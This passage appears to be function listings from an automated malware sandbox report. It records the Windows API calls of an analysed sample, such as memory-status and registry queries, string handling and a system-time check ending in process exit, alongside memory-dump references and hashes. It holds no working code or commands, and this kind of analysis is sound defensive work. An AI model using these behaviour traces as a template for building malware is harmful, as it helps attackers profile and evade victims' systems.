                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 674b19808d3928b60f24bdbc3eb2e327e87277c2a412fbfed44c4184d6fd916d
                                  • Instruction ID: 5a6432bd95bbbc39fcb91cb9450e6759ba7a2cf44d2ee126732b20a730be5599
                                  • Opcode Fuzzy Hash: 674b19808d3928b60f24bdbc3eb2e327e87277c2a412fbfed44c4184d6fd916d
                                  • Instruction Fuzzy Hash: D7112171A04209AFD724DFE9DC84AEA77ACEB44754F104169FA11DA180D774DE40DFA1
                                  Function 00FD5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5B14
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00FD5B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 00FD5B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 00FD5B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: 9edfb5a498ffc343a1d51678bbaf4b5402a7457cc2802740f73780bc96674a05
                                  • Instruction ID: fb6db192c09c9914497c23e596ac7fcde1084470337d7238a24f06cf197b49d8
                                  • Opcode Fuzzy Hash: 9edfb5a498ffc343a1d51678bbaf4b5402a7457cc2802740f73780bc96674a05
                                  • Instruction Fuzzy Hash: C7416371B005199FCF18DF6CC995AAEB7F6EB88710F19822AE915E7344D634DD01CB90
                                  Function 00FC7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7D58
                                    • Part of subcall function 00FDA1C0: std::exception::exception.LIBCMT ref: 00FDA1D5
                                    • Part of subcall function 00FDA1C0: std::exception::exception.LIBCMT ref: 00FDA1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: e4469236f67990287ae44fab7bede3960a2ff9303b3dc41b7915f5589d9a14fe
                                  • Instruction ID: 79ad7f59584cbe5985cc4af712dc77f0e16f66ae1991c823afee74aeab6a8c68
                                  • Opcode Fuzzy Hash: e4469236f67990287ae44fab7bede3960a2ff9303b3dc41b7915f5589d9a14fe
                                  • Instruction Fuzzy Hash: BD21B6327043018BD724EE6CD982F3AF7E5AF91760F244A6EE4528B341D771DC409B65
                                  Function 00FD33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FD33EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD33F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00FD3411
                                  • wsprintfA.USER32 ref: 00FD3437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
                                  • Opcode ID: 095d7ada9a5bc91852bd294525f31841de8bf01bf855ad21369b87317cf6155d
                                  • Instruction ID: aa82942257084f5c79c8edd6616c8c46c5db11050538eea35a7758b391380ba9
                                  • Opcode Fuzzy Hash: 095d7ada9a5bc91852bd294525f31841de8bf01bf855ad21369b87317cf6155d
                                  • Instruction Fuzzy Hash: 0D01F571A00208AFDB24DFD8CC45BAEB7BDEB45720F00012AFA16EB380D774990087A2
                                  Function 00FCD7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,01B9D770,00000000,00020119,?), ref: 00FCD7F5
                                  • RegQueryValueExA.ADVAPI32(?,01B9E130,00000000,00000000,00000000,000000FF), ref: 00FCD819
                                  • RegCloseKey.ADVAPI32(?), ref: 00FCD823
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCD848
                                  • lstrcat.KERNEL32(?,01B9E1D8), ref: 00FCD85C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: d25e25ce05bbd23c9cf84393ee72b1cac56fe6e3f59401905ab61f2cf7ad0fa3
                                  • Instruction ID: 988ed742f0741837fb53fd9820b9554780e77213d6d830c53fff8e817f88e101
                                  • Opcode Fuzzy Hash: d25e25ce05bbd23c9cf84393ee72b1cac56fe6e3f59401905ab61f2cf7ad0fa3
                                  • Instruction Fuzzy Hash: 7B416571A1010D9FCB68EFA4EC82FDD77B8AB94304F444074B51AA7241EB38AA85DF91
                                  Function 00FC7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC7F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC7F60
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC7FA5
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC7FD3
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC8007
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 8b5993f4aebf33ed4937e119c44a64d7986500c65479cb5c9ab67578fe446a77
                                  • Instruction ID: 27bcfc333bf8272bfe2a94792c9e6e6c24e2adda8fff1d3ace00e84687060f55
                                  • Opcode Fuzzy Hash: 8b5993f4aebf33ed4937e119c44a64d7986500c65479cb5c9ab67578fe446a77
                                  • Instruction Fuzzy Hash: 8D419B31A0420ADFCB20EF69D581FAEBBB8FF54300B11409DE8059B245DB71AA66DF91
                                  Function 00FC8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC80BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC80EA
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC8102
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC816F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 3241d72eb35f3bfa9a9705828ac48fe97b71e0a0a359ce94c6e3a2cb0a3ba3ef
                                  • Instruction ID: cb237eb0cc4b5f4237bab69da2ed32c346728335a83fc47cf6683355917a1f61
                                  • Opcode Fuzzy Hash: 3241d72eb35f3bfa9a9705828ac48fe97b71e0a0a359ce94c6e3a2cb0a3ba3ef
                                  • Instruction Fuzzy Hash: 8A41A071A001079BDB21DFB8DA85FAABBF4EF44350F14846CA849D7205EF34D946DB90
                                  Function 00FD1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00FD1B72
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD184F
                                    • Part of subcall function 00FD1820: lstrlen.KERNEL32(01B87218), ref: 00FD1860
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1887
                                    • Part of subcall function 00FD1820: lstrcat.KERNEL32(00000000,00000000), ref: 00FD1892
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00000000), ref: 00FD18C1
                                    • Part of subcall function 00FD1820: lstrlen.KERNEL32(00FE4FA0), ref: 00FD18D3
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00000000), ref: 00FD18F4
                                    • Part of subcall function 00FD1820: lstrcat.KERNEL32(00000000,00FE4FA0), ref: 00FD1900
                                    • Part of subcall function 00FD1820: lstrcpy.KERNEL32(00000000,00000000), ref: 00FD192F
                                  • sscanf.NTDLL ref: 00FD1B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FD1BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FD1BC6
                                  • ExitProcess.KERNEL32 ref: 00FD1BE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: a820b33590444b9fd7704b7cc477a29af5aa9abdf51f4f7f05ece2c4f7a2e061
                                  • Instruction ID: 975793640a675d4ce980ef0278300fc13e689ce3fa1007b35db8d17644077e17
                                  • Opcode Fuzzy Hash: a820b33590444b9fd7704b7cc477a29af5aa9abdf51f4f7f05ece2c4f7a2e061
                                  • Instruction Fuzzy Hash: EC21E4B1518305AF8354DFA5D88485FBBF9FEC8214F408A1EF5A9C7214E730D5058BA2
                                  Function 00FD3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FD3166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,01B8C4E0,00000000,00020119,?), ref: 00FD318C
                                  • RegQueryValueExA.ADVAPI32(?,01B9D710,00000000,00000000,00000000,000000FF), ref: 00FD31A7
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD31B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: c49153bcbc7f1c53cbf06e7052c304aaf08a24f54f7f422091a4ed4e3f0cd716
                                  • Instruction ID: 4e135183952d6583df1ec68982a98a9195b59c9d2df0c92e8f9cd439b43fdb03
                                  • Opcode Fuzzy Hash: c49153bcbc7f1c53cbf06e7052c304aaf08a24f54f7f422091a4ed4e3f0cd716
                                  • Instruction Fuzzy Hash: EB118276A00209AFD724CFD4E845FABBBBCE744720F00422AFA15D7384D775594087A1
                                  Function 00FD90DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 85bcd27a7023ac0fb0b054e2bfe1e72638f1a32777e4f90c7fe5e763bc8d8585
                                  • Instruction ID: bd0f4e46805cd681126c86c9f1cdf59cb4acd6a42ec69897552d27a3a4571ebe
                                  • Opcode Fuzzy Hash: 85bcd27a7023ac0fb0b054e2bfe1e72638f1a32777e4f90c7fe5e763bc8d8585
